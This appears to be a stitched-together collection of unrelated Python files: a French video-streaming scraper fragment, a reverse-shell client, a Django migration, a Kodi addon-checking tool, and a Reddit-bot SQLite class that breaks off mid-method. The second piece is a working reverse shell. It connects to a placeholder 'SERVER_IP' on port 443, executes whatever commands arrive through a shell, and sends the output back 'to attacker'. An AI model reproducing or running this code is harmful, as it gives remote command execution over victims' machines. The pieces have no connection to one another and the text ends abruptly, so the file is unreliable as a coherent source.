r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
r = [(i[0], re.sub(' \&\#[0-9]{4,6};', '', i[1]), i[2], i[3]) for i in r]
r = [i[0] for i in r if tq2 == cleantitle.get(i[1])][0]
url = re.findall('(?://.+?|)(/.+)', r)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
r = client.request('http://www.cinemay.com' + url)
print 'http://www.cinemay.com' + url
r = client.parseDOM(r, 'div', attrs={'class': 'module-actionbar'})
r = client.parseDOM(r, 'a', ret='href')
for i in r:
if i =='#':
continue
url = client.request('http://www.cinemay.com' + i)
url = client.parseDOM(url, 'div', attrs={'class': 'wbox2 video dark'})
url = client.parseDOM(url, 'iframe', ret='src')[0]
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if not host in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': 'SD', 'language': 'FR', 'url': url, 'direct': False, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url
|
import socket,subprocess
HOST = 'SERVER_IP' # The remote host
PORT = 443 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('[*] Connection Established!')
while 1:
# recieve shell command
data = s.recv(1024)
# if its quit, then break out and close socket
if data == "quit": break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
s.close()
|
from openwns.module import Module
class DLL(Module):
def __init__(self):
super(DLL, self).__init__("dll", "dllbase")
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('activitydb', '0015_auto_20150924_0646'),
]
operations = [
migrations.RemoveField(
model_name='projectproposal',
name='approval_submitted_by',
),
migrations.RemoveField(
model_name='projectproposal',
name='approved_by',
),
migrations.RemoveField(
model_name='projectproposal',
name='community',
),
migrations.RemoveField(
model_name='projectproposal',
name='estimated_by',
),
migrations.RemoveField(
model_name='projectproposal',
name='office',
),
migrations.RemoveField(
model_name='projectproposal',
name='program',
),
migrations.RemoveField(
model_name='projectproposal',
name='project_type',
),
migrations.RemoveField(
model_name='projectproposal',
name='sector',
),
migrations.AddField(
model_name='projectagreement',
name='exchange_rate',
field=models.CharField(help_text='Local Currency exchange rate to USD', max_length=255, null=True, blank=True),
),
migrations.AddField(
model_name='projectagreement',
name='exchange_rate_date',
field=models.DateField(help_text='Date of exchange rate', null=True, blank=True),
),
migrations.AddField(
model_name='projectagreement',
name='local_mc_estimated_budget',
field=models.CharField(help_text='Total portion of estimate for your agency', max_length=255, null=True, verbose_name='Estimated Organization Total in Local Currency', blank=True),
),
migrations.AddField(
model_name='projectagreement',
name='local_total_estimated_budget',
field=models.CharField(help_text='In Local Currency', max_length=255, null=True, verbose_name='Estimated Total in Local Currency', blank=True),
),
migrations.AlterField(
model_name='projectagreement',
name='account_code',
field=models.CharField(max_length=255, null=True, verbose_name='Account Code', blank=True),
),
migrations.AlterField(
model_name='projectagreement',
name='lin_code',
field=models.CharField(max_length=255, null=True, verbose_name='LIN Sub Code', blank=True),
),
migrations.DeleteModel(
name='ProjectProposal',
),
]
|
"""
addonpr addonparser module
Copyright (C) 2012-2013 Team XBMC
http://www.xbmc.org
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; see the file LICENSE. If not, see
<http://www.gnu.org/licenses/>.
"""
from __future__ import division
import os
import re
import logging
import xml.etree.ElementTree as ET
from xml.dom import minidom
from xml.parsers.expat import ExpatError
from datetime import datetime, timedelta
from PIL import Image
from config import BRANCHES, DEPENDENCIES, STRINGS_ID
from addonpr import command
logger = logging.getLogger(__name__)
def filter_comments(infile):
"""Generator to filter commented line in a python file"""
for line in infile:
# Remove leading and trailing characters
line = line.strip()
# Skip blank line
if line == '':
continue
if not line.startswith('#'):
yield line
class Addon(object):
"""Class used to parse the addon.xml"""
def __init__(self, addon_path):
tree = ET.parse(os.path.join(addon_path, 'addon.xml'))
self._root = tree.getroot()
self.addon_id = self._root.get('id')
self.name = self._root.get('name')
self.version = AddonVersion(self._root.get('version'))
self.provider = self._root.get('provider-name')
self.addon_type = None
self.dependencies = []
self.extensions = []
self.metadata = {}
self._parse()
def _parse(self):
"""Parse the addon.xml"""
requires = self._root.find('requires')
self.dependencies = [elt.attrib for elt in list(requires)]
for ext in self._root.iter('extension'):
if ext.get('point') == 'xbmc.addon.metadata':
self.metadata = self._get_metadata(ext)
else:
self.extensions.append(self._get_extension(ext))
self.addon_type = self._get_addon_type()
def _get_extension(self, ext):
extension = ext.attrib
try:
extension['provides'] = ext.find('provides').text
except AttributeError:
extension['provides'] = ''
return extension
def _get_metadata(self, ext):
metadata = {}
for elt in list(ext):
tag = elt.tag
if tag in ('summary', 'description', 'disclaimer'):
if tag not in metadata:
metadata[tag] = {}
try:
metadata[tag][elt.attrib['lang']] = elt.text
except KeyError:
metadata[tag]['en'] = elt.text
else:
metadata[tag] = elt.text
return metadata
def _get_addon_type(self):
"""Return the addon type"""
for extension in self.extensions:
extension_type = extension['point']
if extension_type == 'xbmc.gui.skin':
return 'skin'
elif extension_type == 'xbmc.gui.webinterface':
return 'webinterface'
elif extension_type.startswith('xbmc.metadata.scraper'):
return 'scraper'
elif (extension_type == 'xbmc.python.pluginsource' and not
self.addon_id.startswith('script')):
return 'plugin'
else:
return 'script'
def is_broken(self):
"""Return True if the addon is broken"""
return 'broken' in self.metadata
def get_extension_points(self):
"""Return a list of extension points (excluding metadata)"""
return [extension['point'] for extension in self.extensions]
def get_extensions(self, point):
"""Return a filtered list of extensions by point-attribute"""
return [ext for ext in self.extensions if ext.get('point') == point]
def last_commit_date(self):
"""Return the last commit date"""
timestamp = command.run(
'git log -n1 --format="%ct" {}'.format(
os.path.join(self.addon_id, 'addon.xml')))
return datetime.fromtimestamp(float(timestamp))
def is_last_commit_older_than(self, days):
age = datetime.now() - self.last_commit_date()
return age > timedelta(days=days)
class AddonVersion(object):
"""Class to represent and compare addon versions"""
version_re = re.compile(r'^(\d+)\.(\d+)(?:\.(\d+))?$',
re.VERBOSE)
def __init__(self, vstring):
self._parse(vstring)
self.length = len(self.version)
def _parse(self, vstring):
match = self.version_re.match(vstring)
if not match:
raise ValueError("invalid version number '%s'" % vstring)
(major, minor, patch) = match.groups()
if patch is None:
self.version = tuple(map(int, [major, minor]))
else:
self.version = tuple(map(int, [major, minor, patch]))
def __str__(self):
return '.'.join(map(str, self.version))
def __cmp__(self, other):
if isinstance(other, basestring):
other = AddonVersion(other)
return cmp(self.version, other.version)
class AddonCheck(object):
"""Class to run addon tests"""
def __init__(self, addon_path, xbmc_branch, addon_id=None,
addon_version=None, parent_dir=None):
self.addon_id = addon_id
self.addon_path = self._get_addon_path(addon_path)
self.xbmc_branch = xbmc_branch
self.addon_version = addon_version
self.parent_dir = parent_dir
self.files = self._get_files()
self.addon = Addon(self.addon_path)
self.warnings = 0
self.errors = 0
def _warning(self, message, *args, **kwargs):
self.warnings += 1
logger.warning(message, *args, **kwargs)
def _error(self, message, *args, **kwargs):
self.errors += 1
logger.error(message, *args, **kwargs)
def _get_files(self):
filenames = [os.path.join(root, name)
for root, dirs, files in os.walk(self.addon_path)
for name in files]
return filenames
def _get_addon_path(self, addon_path):
if self.addon_id and os.path.isdir(os.path.join(addon_path, self.addon_id)):
addon_path = os.path.join(addon_path, self.addon_id)
logger.debug('Switched to addon subdir: %s', addon_path)
return addon_path
def _checkout_branch(self, repo):
"""Checkout the proper branch in repo"""
current_dir = os.getcwd()
try:
os.chdir(repo)
except OSError as e:
logger.error('OSError: %s', e.strerror)
return
command.run('git checkout -qf %s' % self.xbmc_branch)
os.chdir(current_dir)
def check_xbmc_version(self):
if self.xbmc_branch not in BRANCHES:
self._error('Invalid xbmc version: %s',
self.xbmc_branch)
def check_addon_version(self):
if self.xbmc_branch == 'frodo':
if self.addon.version.length != 3:
self._error('Invalid version %s for frodo. Should be x.y.z.',
self.addon.version)
def check_addon_xml(self):
if self.addon_id is not None and self.addon_id != self.addon.addon_id:
self._error("Given addon id doesn't match %s",
self.addon.addon_id)
if self.addon_version is not None and self.addon_version != self.addon.version:
self._error("Given addon version doesn't match %s",
self.addon.version)
if 'language' not in self.addon.metadata:
self._error('Missing language tag')
def check_optional_info(self):
for tag in ['license', 'forum', 'website', 'source', 'email']:
if tag not in self.addon.metadata:
self._warning('Missing optional %s tag' % tag)
def check_dependencies(self):
xbmc_dependencies = DEPENDENCIES[self.xbmc_branch]
if self.parent_dir is not None:
# Prepare the repositories for dependencies check
for repo in ['plugins', 'scripts']:
self._checkout_branch(os.path.join(self.parent_dir, repo))
for dependency in self.addon.dependencies:
dependency_id = dependency['addon']
try:
dependency_version = dependency['version']
except KeyError:
logger.debug('Skipping %s dependency (no version specified)',
dependency_id)
continue
if dependency_id in xbmc_dependencies:
if dependency_version != xbmc_dependencies[dependency_id]:
self._error('Invalid version for %s (%s != %s)',
dependency_id,
dependency_version,
xbmc_dependencies[dependency_id])
else:
logger.debug('%s dependency OK (%s)',
dependency_id,
dependency_version)
elif self.parent_dir is not None:
# Try to check plugins and scripts dependencies
for repo in ['plugins', 'scripts']:
dependency_dir = os.path.join(self.parent_dir, repo, dependency_id)
if os.path.isdir(dependency_dir):
dependency_addon = Addon(dependency_dir)
if dependency_version > dependency_addon.version:
self._error('Invalid version for %s (%s > %s)',
dependency_id,
dependency_version,
dependency_addon.version)
else:
logger.debug('%s dependency OK (%s <= %s)',
dependency_id,
dependency_version,
dependency_addon.version)
break
else:
logger.debug('Skipping dependency %s (not found in plugins or scripts)',
dependency_id)
else:
logger.debug('Skipping dependency %s (no parent_dir given)',
dependency_id)
def check_addon_structure(self):
for mandatory in ('addon.xml', 'LICENSE.txt'):
if not os.path.isfile(os.path.join(self.addon_path, mandatory)):
self._error('Missing %s file', mandatory)
for recommended in ('changelog.txt',):
if not os.path.isfile(os.path.join(self.addon_path, recommended)):
self._warning('Missing recommended %s file', recommended)
def check_forbidden_files(self):
for filename in self.files:
if filename.endswith(('.so', '.dll', '.pyo', '.pyc',
'.exe', '.xbt', '.xpr', 'Thumbs.db', '.DS_Store')):
self._error('%s is not allowed', filename)
def _get_image_size(self, picture):
try:
img = Image.open(os.path.join(self.addon_path, picture))
except IOError:
logger.debug("Picture %s doesn't exist" % picture)
return (0, 0)
return img.size
def check_images(self):
# module are not visible and don't require any images
if 'xbmc.python.module' in self.addon.get_extension_points():
logger.debug('No check done on images for %s' % self.addon.addon_id)
else:
width, height = self._get_image_size('icon.png')
if (width, height) != (256, 256):
self._error('Incorrect icon.png size: %dx%d', width, height)
width, height = self._get_image_size('fanart.jpg')
#if (width, height) != (0, 0) and width / height != 16 / 9:
if (width, height) != (0, 0) and not (width, height) in ((1280, 720),
(1920, 1080)):
self._error('Incorrect fanart.jpg aspect ratio: %dx%d', width, height)
def check_forbidden_patterns(self):
for filename in self.files:
if filename.endswith('.py'):
logger.debug('Checking %s' % filename)
with open(filename, 'rb') as f:
for line in filter_comments(f):
if 'os.getcwd' in line:
self._warning('%s: os.getcwd() is deprecated', filename)
if 'PLAYER_CORE' in line:
self._warning('{}: setting PLAYER_CORE_* is deprecated'.format(filename))
if 'executehttpapi' in line:
self._warning('{}: executehttpapi is deprecated'.format(filename))
def get_po_strings_id(self, filename):
"""Generator that returns all strings id from a po file"""
with open(filename, 'r') as f:
for line in f:
line = line.strip()
if line.startswith("msgctxt"):
# msgctxt "#30301"
try:
yield int(line.split()[1][2:-1])
except ValueError:
self._warning('{}: has not integer string ID: {}'.format(filename, line))
def get_xml_strings_id(self, filename):
"""Generator that returns all strings id from a xml file"""
try:
tree = ET.parse(filename)
except ET.ParseError as e:
self._error('Parse error in {}: {}'.format(filename, e))
raise StopIteration
for elt in tree.getroot():
yield int(elt.get('id'))
def get_strings_id(self, filename):
"""Generator that returns all strings id from file"""
file_type = filename.split('.')[-1]
try:
return getattr(self, 'get_{}_strings_id'.format(file_type))(filename)
except AttributeError:
logger.warning('Unknown strings file type: {}'.format(file_type))
return []
@staticmethod
def is_valid_string_id(string_id, addon_type='all'):
try:
min_id, max_id = STRINGS_ID[addon_type]
except KeyError:
min_id, max_id = STRINGS_ID['all']
return min_id <= string_id <= max_id
def check_strings_id(self):
for filename in self.files:
if filename.endswith(('strings.xml', 'strings.po')):
logger.debug('Checking %s' % filename)
for string_id in self.get_strings_id(filename):
if not self.is_valid_string_id(string_id, 'all'):
self._error('Invalid string id {}'.format(string_id))
elif not self.is_valid_string_id(string_id, self.addon.addon_type):
self._warning('Invalid string id {} for {}'.format(
string_id, self.addon.addon_type))
def check_xml_encoding(self):
for filename in self.files:
if filename.endswith('.xml'):
try:
dom = minidom.parse(filename)
except ExpatError as e:
self._error('{}: {}'.format(filename, e))
else:
if not dom.encoding:
self._error('No xml encoding specified in {}'.format(filename))
else:
logger.debug('{} encoding: {}'.format(filename, dom.encoding))
def check_print_statements(self):
print_re = re.compile('print[ \(]')
for filename in self.files:
if filename.endswith('.py'):
if 'test' in filename:
logger.debug('Skipping %s for print-check' % filename)
continue
logger.debug('Checking %s' % filename)
with open(filename, 'rb') as f:
for line in filter_comments(f):
if print_re.search(line):
self._warning('%s: print statement should be replaced with xbmc.log()', filename)
logger.debug(line)
# We need only one warning per file, so exit the
# loop
break
def check_language_dirs(self):
language_dir = os.path.join(self.addon_path, 'resources', 'language')
if not os.path.exists(language_dir):
return
for dirname in os.listdir(language_dir):
logger.debug('Checking language dir {}'.format(dirname))
# The language dir can be made of several words:
# Chinese (Traditional)
# Checking only the first word should be good enough
first_word = dirname.split()[0]
if first_word != first_word.capitalize():
self._warning('Language dir {} should be capitalized'.format(
dirname))
def check_extension_point(self):
if 'xbmc.addon.repository' in self.addon.get_extension_points():
self._error('xbmc.addon.repository extension point is not allowed')
for extension in self.addon.get_extensions('xbmc.service'):
if 'start' in extension and extension['start'] not in ('startup', 'login'):
self._error(('Wrong start-attribute for service extension. '
'It needs to be either "startup" or "login"'))
def run(self):
"""Run all the check methods and return the numbers of warnings and errors"""
logger.info('Checking %s', self.addon_path)
for attribute in dir(self):
if attribute.startswith('check_'):
logger.debug('Running %s' % attribute)
getattr(self, attribute)()
logger.info('%d warning(s) and %d error(s) found', self.warnings,
self.errors)
return (self.warnings, self.errors)
|
import logging
import sqlite3
from pkg_resources import resource_filename
import time
import atexit
class Database:
"""
This object provides a full set of features to interface with a basic session database,
which includes following tables:
- **storage**: saves the state of the bot and helps against double posting
- **update_threads**: storage to store thing_ids which have to be updated by your plugin
- **modules**: persistent module storage
- **userbans**: a table to ban users from being able to trigger certain plugins
- **subbans**: a table to ban subreddits from being able to trigger certain plugins
:ivar logger: A database specific database logger. Is currently missing debug-messages for database actions.
:type logger: logging.Logger
:vartype logger: logging.Logger
:ivar db: A connection to the SQLite database: ``/config/storage.db``
:type db: sqlite3.Connection
:vartype db: sqlite3.Connection
:ivar cur: Cursor to interface with the database.
:type cur: sqlite3.Cursor
:vartype cur: sqlite3.Cursor
:ivar _meta_push: Dictionary with helper methods to reduce the amount of requests for meta tables
:type _meta_push: dict
:vartype _meta_push: dict
:ivar _MAX_CACHE = maximum content within the _meta_push dictionary to get pushed into the database.
:type _MAX_CACHE: int
:vartype _MAX_CACHE: int
"""
def __init__(self):
self.logger = logging.getLogger("database")
self.db = sqlite3.connect(
resource_filename("config", "storage.db"),
check_same_thread=False,
isolation_level=None
)
self.cur = self.db.cursor()
self.database_init()
self._meta_push = {'submissions': 0, 'comments': 0, 'cycles': 0}
self._MAX_CACHE = 500
self._date = time.time() // (60 * 60)
atexit.register(self.write_out_meta_push, force=True) # When the database gets closed, write out the meta
# atexit.register(self.db.close)
atexit.register(self.logger.warning, "DB connection has been closed.")
def database_init(self):
"""
Initialized the database, checks manually (because: why not?) if those tables already exist and if not, creates
the necessary tables. You can modify the PRAGMA or add tables however you please, as long as you keep the order
of these tables (their columns) intact. Some SQL statements are not completely explicit to be independent on
order.
"""
info = lambda x: self.logger.info("Table '{}' had to be generated.".format(x))
if not self._database_check_if_exists('storage'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS storage (thing_id STR(15), bot_module INT(5), timestamp datetime)'
)
info('storage')
if not self._database_check_if_exists('update_threads'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS update_threads '
'(thing_id STR(15) NOT NULL, bot_module INT(5), created DATETIME, '
'lifetime DATETIME, last_updated DATETIME, interval INT(5))'
)
info('update_threads')
if not self._database_check_if_exists('modules'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS modules '
'(module_name STR(50))'
)
info('modules')
if not self._database_check_if_exists('userbans'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS userbans (username STR(50) NOT NULL, bot_module INT(5))'
)
info('userbans')
if not self._database_check_if_exists('subbans'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS subbans (subreddit STR(50) NOT NULL, bot_module INT(5))'
)
info('subbans')
if not self._database_check_if_exists('stats'):
self.cur.execute(
'CREATE TABLE IF NOT EXISTS stats '
'(id STR(10) NOT NULL, bot_module INT(5),'
' created DATETIME, title STR(300), username STR(50), '
' permalink STR(150), subreddit STR(50), upvotes_author INT(5), upvotes_bot INT(5))'
)
info('stats')
if not self._database_check_if_exists('messages'):
self.cur.execute(
'''CREATE TABLE IF NOT EXISTS messages
(id STR(10) NOT NULL, bot_module INT(5), created DATETIME, title STR(300),
author STR(50), body STR)'''
)
info('messages')
if not self._database_check_if_exists('meta_stats'):
self.cur.execute(
'''CREATE TABLE IF NOT EXISTS meta_stats
(day DATE NOT NULL,
seen_submissions INT(10) DEFAULT 0,
seen_comments INT(10) DEFAULT 0,
update_cycles INT(10) DEFAULT 0)
''')
info('meta_stats')
def _database_check_if_exists(self, table_name):
"""
Helper method to check if a certain table (by name) exists. Refrain from using it if you're not adding new
tables.
:param table_name: Name of the table you want to check if it exists.
:type table_name: str
:return: Tuple of the table name, empty if it doesn't exist.
"""
self.cur.execute('SELECT name FROM sqlite_master WHERE type="table" AND name=(?)', (table_name,))
return self.cur.fetchone()
def insert_into_storage(self, thing_id, module):
"""
Stores a certain thing (id of comment or submission) into the storage, which is for the session consistency.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute('INSERT INTO storage VALUES ((?), (SELECT _ROWID_ FROM modules WHERE module_name=(?)), '
'CURRENT_TIMESTAMP)', (thing_id, module))
self.logger.debug('{} from {} inserted into storage.'.format(thing_id, module))
def get_all_storage(self):
"""
Returns all elements inside the bot storage.
:return: Tuple with tuples with all storage elements with ``(thing_id, module_name, timestamp)``
"""
self.cur.execute("""SELECT thing_id, module_name, timestamp FROM storage
INNER JOIN modules
ON storage.bot_module = modules._ROWID_""")
return self.cur.fetchall()
def retrieve_thing(self, thing_id, module):
"""
Returns a single thing from the storage by thing_id and module name. Mainly used to check if a plugin already
answered on a post.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
:return: Tuple with ``(thing_id, bot_module, timestamp)``
"""
self._error_if_not_exists(module)
self.cur.execute("""SELECT thing_id, bot_module, timestamp FROM storage
WHERE thing_id = (?)
AND bot_module = (SELECT _ROWID_ FROM modules WHERE module_name=(?))
LIMIT 1""",
(thing_id, module,))
return self.cur.fetchone()
def delete_from_storage(self, min_timestamp):
"""
Deletes **all** items which are older than the given timestamp.
:param min_timestamp: Unix timestamp where all entries in storage get deleted if they're older than that.
:type min_timestamp: int | float
"""
self.cur.execute("DELETE FROM storage WHERE timestamp <= datetime((?), 'unixepoch')", (min_timestamp,))
self.logger.debug('Deleted everything from storage older than {}'.format(min_timestamp))
def select_from_storage(self, older_than_timestamp):
"""
Selects and retrieves all elements in the storage which are older than this timestamp.
:param older_than_timestamp: Unix timestamp of which time everything has to be selected before.
:type older_than_timestamp: int | float
:return: Tuples of ``(thing_id, bot_module, timestamp)``
"""
self.cur.execute("SELECT * FROM storage WHERE timestamp <= datetime((?), 'unixepoch')", (older_than_timestamp,))
return self.cur.fetchall()
def insert_into_update(self, thing_id, module, lifetime, interval):
"""
Inserts a thing_id (from a comment or submission) into the update-table, which later gets retrieved from the
update-thread and fired onto the plugin.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
:param lifetime: Lifetime until this item is valid in Unix timestamp.
:type lifetime: float | int
:param interval: Interval of how often you'd want this to update in seconds.
:type interval: int
"""
self._error_if_not_exists(module)
self.cur.execute("""
INSERT INTO update_threads (thing_id, bot_module, created, lifetime, last_updated, interval)
VALUES (
(?),
(SELECT _ROWID_ FROM modules WHERE module_name=(?)),
CURRENT_TIMESTAMP,
datetime('now', '+' || (?) || ' seconds'),
CURRENT_TIMESTAMP,
(?))
""",
(thing_id, module, lifetime, interval,))
self.logger.debug('Inserted {} from {} to update - lifetime: {} | interval: {}'.format(thing_id, module,
lifetime, interval))
def get_all_update(self):
"""
Returns all elements inside the update_htreads table.
:return: Tuple with tuples of ``(thing_id, module_name, created, lifetime, last_updated, interval)``
"""
self.cur.execute("""SELECT thing_id, module_name, created, lifetime, last_updated, interval
FROM update_threads
INNER JOIN modules
ON update_threads.bot_module = modules._ROWID_
ORDER BY last_updated ASC""")
return self.cur.fetchall()
def _select_to_update(self, module):
"""
Selector method to get the cursor selecting all outstanding threads to update for a certain module. Refrain from
using it, since it only places the cursor.
:param module: A string naming your plugin.
:type module: str
"""
self._error_if_not_exists(module)
self.cur.execute("""SELECT thing_id, module_name, created, lifetime, last_updated, interval
FROM update_threads
INNER JOIN modules
ON update_threads.bot_module = modules._ROWID_
WHERE modules.module_name = (?)
AND CURRENT_TIMESTAMP > (datetime(update_threads.last_updated,
'+' || update_threads.interval || ' seconds'))
ORDER BY last_updated ASC""",
(module,))
def get_latest_to_update(self, module):
"""
Returns a single thing_id (from comment or submssion) for a single module.
:param module: A string naming your plugin.
:type module: str
:return: Tuple with tuples of ``(thing_id, module_name, created, lifetime, last_updated, interval)``
"""
self._select_to_update(module)
return self.cur.fetchone()
def get_all_to_update(self, module):
"""
Returns **all** thing_ids (from a comment or submission) for a module.
:param module: A string naming your plugin.
:type module: str
:return: Tuple with tuples of ``(thing_id, module_name, created, lifetime, last_updated, interval)``
"""
self._select_to_update(module)
return self.cur.fetchall()
def update_timestamp_in_update(self, thing_id, module):
"""
Updates the timestamp when a thing_id was updated last.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
"""
self._error_if_not_exists(module)
self.cur.execute("""UPDATE update_threads
SET last_updated=CURRENT_TIMESTAMP
WHERE thing_id=(?)
AND bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))""",
(thing_id, module))
self.logger.debug('Updated timestamp on {} from {}'.format(thing_id, module))
def delete_from_update(self, thing_id, module):
"""
Deletes **all** thing_ids (from a comment or submission) for a module when it outlived its lifetime.
:param thing_id: Unique thing_id from a comment or submission.
:type thing_id: str
:param module: A string naming your plugin.
:type module: str
"""
self._error_if_not_exists(module)
self.cur.execute("""DELETE FROM update_threads
WHERE thing_id=(?)
AND bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))
AND CURRENT_TIMESTAMP > lifetime""", (thing_id, module))
def register_module(self, module):
"""
Registers a module if it hasn't been so far. A module has to be registered to be useable with the rest of the
database.
:param module: A string naming your plugin.
:type module: str
"""
if self._check_if_module_exists(module):
return
self.cur.execute('INSERT INTO modules VALUES ((?))', (module,))
self.logger.debug("Module {} has been registered.".format(module))
def get_all_userbans(self):
"""
Returns all bans stored in the userban table.
:return: Tuple of tuples ``(username, bot_module)``
"""
self.cur.execute('SELECT * FROM userbans')
return self.cur.fetchall()
def get_all_bans_per_user(self, username):
"""
Returns all bans of a particular user across all plugins.
:param username: Author in fulltext in question
:type username: str
:return: Tuple of tuples ``(username, bot_module)``
"""
self.cur.execute('SELECT * FROM userbans WHERE username = (?) LIMIT 1', (username,))
return self.cur.fetchall()
def check_user_ban(self, username, module):
"""
Checks if a particular user has been banned, first searches per module, then if there is a global ban.
:param username: Author in fulltext in question
:type username: str
:param module: A string naming your plugin.
:type module: str
:return: Boolean if banned or not.
"""
self.cur.execute('SELECT * FROM userbans '
'WHERE username = (?) AND '
'bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?)) '
'LIMIT 1', (username, module))
if self.cur.fetchone():
return True
self.cur.execute('SELECT * FROM userbans '
'WHERE username = (?) AND '
'bot_module = (SELECT _ROWID_ FROM modules WHERE module_name IS NULL ) '
'LIMIT 1', (username,))
return self.cur.fetchone() is True
def add_userban_per_module(self, username, module):
"""
Bans a user for a certain module.
:param username: Author in fulltext in question
:type username: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("INSERT INTO userbans (username, bot_module) "
"VALUES ((?), (SELECT _ROWID_ FROM modules WHERE module_name = (?)))", (username, module))
self.logger.debug('User {} got banned on {}'.format(username, module))
def add_userban_globally(self, username):
"""
Bans a user for all modules.
:param username: Author in fulltext in question
:type username: str
"""
self.cur.execute("INSERT INTO userbans (username, bot_module) "
"VALUES ((?), NULL)", (username,))
self.logger.debug('User {} got banned across all modules.'.format(username))
def remove_userban_per_module(self, username, module):
"""
Removes a ban from a certain modules.
:param username: Author in fulltext in question
:type username: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("DELETE FROM userbans WHERE username = (?) AND "
"bot_module = (SELECT _ROWID_ FROM modules WHERE modules = (?))", (username, module))
self.logger.debug('User {} got unbanned on {}'.format(username, module))
def remove_userban_globally(self, username):
"""
Removes **all** bans for a user. Globally and per module level.
:param username: Author in fulltext in question
:type username: str
"""
self.cur.execute("DELETE FROM userbans WHERE username = (?)", (username,))
self.logger.debug('User {} got unbanned across all modules.'.format(username))
def purge_all_user_bans(self):
"""
Removes **all** bans for **all** users - no exception, clears the entire table.
"""
self.cur.execute("DELETE FROM userbans")
self.logger.debug('Removed all userbans!')
def get_all_banned_subreddits(self):
"""
Returns all bans stored in the subreddit ban table
"""
self.cur.execute('SELECT * FROM subbans')
return self.cur.fetchall()
def get_all_bans_per_subreddit(self, subreddit):
"""
Returns **all** bans for a particular subreddit
:param subreddit: Author in fulltext in question
:type subreddit: str
"""
self.cur.execute('SELECT * FROM subbans WHERE subreddit = (?) LIMIT 1', (subreddit,))
return self.cur.fetchall()
def check_subreddit_ban(self, subreddit, module):
"""
Returns if a certain subreddit is banned from a module or across all modules.
:param subreddit: Author in fulltext in question
:type subreddit: str
:param module: A string naming your plugin.
:type module: str
:return: Boolean, True if banned, False if not.
"""
self.cur.execute('SELECT * FROM subbans '
'WHERE subreddit = (?) AND '
'bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?)) '
'LIMIT 1', (subreddit, module))
if self.cur.fetchone():
return True
self.cur.execute('SELECT * FROM subbans '
'WHERE subreddit = (?) AND '
'bot_module = (SELECT _ROWID_ FROM modules WHERE module_name IS NULL ) '
'LIMIT 1', (subreddit,))
return self.cur.fetchone() is True
def add_subreddit_ban_per_module(self, subreddit, module):
"""
Bans a subreddit from a certain module.
:param subreddit: Author in fulltext in question
:type subreddit: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("INSERT INTO subbans (subreddit, bot_module) "
"VALUES ((?), (SELECT _ROWID_ FROM modules WHERE module_name = (?)))", (subreddit, module))
self.logger.debug('Subreddit {} got banned on {}'.format(subreddit, module))
def add_subreddit_ban_globally(self, subreddit):
"""
Bans a subreddit across all subreddits.
:param subreddit: Author in fulltext in question
:type subreddit: str
"""
self.cur.execute("INSERT INTO subbans (subreddit, bot_module) "
"VALUES ((?), NULL)", (subreddit,))
self.logger.debug('Subreddit {} got banned across all modules.'.format(subreddit))
def remove_subreddit_ban_per_module(self, subreddit, module):
"""
Removes a subreddit ban for a certain module
:param subreddit: Author in fulltext in question
:type subreddit: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("DELETE FROM subbans WHERE subreddit = (?) AND "
"bot_module = (SELECT _ROWID_ FROM modules WHERE modules = (?))", (subreddit, module))
self.logger.debug('Subreddit {} got unbanned on {}'.format(subreddit, module))
def remove_subreddit_ban_globally(self, subreddit):
"""
Removes a subreddit ban across all modules and globally
:param subreddit: Author in fulltext in question
:type subreddit: str
"""
self.cur.execute("DELETE FROM subbans WHERE subreddit = (?)", (subreddit,))
self.logger.debug('Subreddit {} got unbanned across all modules.'.format(subreddit))
def purge_all_subreddit_bans(self):
"""
Removes all subreddit bans from the table - no exceptions, clears the table.
"""
self.cur.execute("DELETE FROM subbans")
self.logger.debug('All subreddit bans removed!')
def _check_if_module_exists(self, module):
"""
Helper method to determine if a module has already been registered. Refrain from using it, hence it is private.
:param module: A string naming your plugin.
:type module: str
:return: Boolean determining if a module already has been registered.
:raise ValueError: In case of a module being registered multiple times - which should never happen - the
``Database`` object will raise a value error.
"""
self.cur.execute('SELECT COUNT(*) FROM modules WHERE module_name = (?)', (module,))
result = self.cur.fetchone()
if result[0] == 0:
return False
if result[0] == 1:
return True
if result[0] > 1:
raise ValueError("A module was registered multiple times and is therefore inconsistent. Call for help.")
def _error_if_not_exists(self, module):
"""
